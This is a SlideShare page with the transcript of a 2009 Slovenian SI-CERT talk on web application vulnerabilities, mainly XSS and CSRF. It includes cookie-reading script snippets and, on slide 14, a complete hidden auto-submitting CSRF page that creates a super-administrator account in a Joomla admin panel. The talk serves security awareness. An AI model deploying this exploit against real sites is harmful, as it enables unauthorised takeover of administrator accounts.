Your SlideShare is downloading. ×
2009 Ranljivosti spletnih aplikacij
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

2009 Ranljivosti spletnih aplikacij

118
views

Published on

Opis nekaj najbolj pogostih ranljivosti spletnih aplikacij

Opis nekaj najbolj pogostih ranljivosti spletnih aplikacij

Published in: Internet, Technology, Business

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
118
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Ranljivosti spletnih aplikacij Tadej Hren, SI-CERT(ARNES)
  • 2. SPLETNA APLIKACIJA
  • 3. RANLJIVA APLIKACIJA
  • 4. Top 10 • Cross Site Scripting (XSS) • Injection Flaws • Malicious File Execution (RFI) • Insecure Direct Object Reference • Cross Site Request Forgery (CSRF) • Information Leakage and Improper Error Handling • Broken Authentication and Session Management • Insecure Cryptographic Storage • Insecure Communications • Failure to Restrict URL Access • ...
  • 5. Kako deluje splet? google.com GET /index.html HTTP/1.x 200 OK <html><head><title>Google</title>... <img src="/images/logo.png"/><input type=submit value= "Iskanje Google">...</html> GET /images/logo.png HTTP/1.x 200 OK ...........X.v.6...S.Z.j..O..Q.7q..6'M6...f.9 ... .....s..z.O.....E.Iv....x...&.. `.....Mr=..INq2....(.....[F.......uI= T."O.....!"9...........D3..........&J.._,
  • 6. Bi kdo piškotek? gmail.com POST /accounts/Login?service=mail Email=tadej.hren&Passwd=blabla HTTP/1.x 200 OK Set-Cookie: SID=DQA4V8lfg4dtusv <html><head>... GET /mail/sendmail?service=mail Cookie: SID=DQA4V8lfg4dtusv HTTP/1.x 200 OK <html><head>... user:tadej.hren Cookie:DQA4V8… …
  • 7. Javascript <script>document.cookie</script>
  • 8. Javascript <script>alert("Pomembno obvestilo!")</script>
  • 9. Cross Site Scripting (XSS) Izkorišča zaupanje uporabnika, ki ga ima do spletne strani
  • 10. XSS DEMO
  • 11. Cross Site Request Forgery (CSRF) Izkorišča zaupanje spletne strani, ki ga ima do uporabnika
  • 12. CSRF SPLETNA STRANBRSKALNIKUPORABNIK Avtenticirana seja X DEJANJE
  • 13. CSRF DEMO
  • 14. Slikca? <html><body> <script type="text/javascript"> window.onload = function() {<html><body><script type="text/javascript"> window.onload = function() { var url = "http://localhost/slojoomla/administrator/index2.php"; var gid = 25; var user = 'ub3rh4cker'; var pass = 'password'; var email = 'ub3rh4cker@guest.arnes.si'; var param = { name: user, username: user, email: email, password: pass, password2: pass, gid: gid, block: 0, option: 'com_users', task: 'save', sendEmail: 1 }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } </script> <iframe name="hidden" style="display: none"></iframe> <img src="clip.png"></body></html>
  • 15. XSS+CSRF Anica Bine Cene Davor Erika Filip Grega Haso Ivan Ivan Joži Karmen Luka Mitja Nina Oma Petra Rado Suljo Šime Tedi Urbi Vera Zarja Željko
  • 16. RANLJIVA APLIKACIJA
  • 17. RANLJIVA APLIKACIJA
  • 18. Zaščita? IE8 FF&NoScript
  • 19. Vprašanja? • http://www.cert.si • http://www.arnes.si/si-cert • http://www.twitter.com/sicert • si-cert@arnes.si